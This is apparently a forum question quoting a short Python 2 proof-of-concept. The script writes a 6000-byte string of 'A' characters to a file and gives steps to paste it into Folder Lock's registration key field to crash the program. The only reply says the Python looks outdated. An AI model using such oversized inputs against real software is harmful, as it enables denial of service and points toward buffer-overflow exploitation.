- 1
Please solve the problem
1.-Run python code :Folder_Lock.py 2.- Open EVIL.txt and copy content to clipboard 3.- Open Folderlock and Click 'Enter Key' 4.- Paste the content of EVIL.txt into the Field: 'Serial Number and Registration Key' 5.- Click 'Submit' and you will see a crash. #!/usr/bin/env python buffer = "\x41" * 6000 try: f=open("Evil.txt","w") print "[+] Creating %s bytes evil payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"
1 ответ
0
Looks like an outdated version of python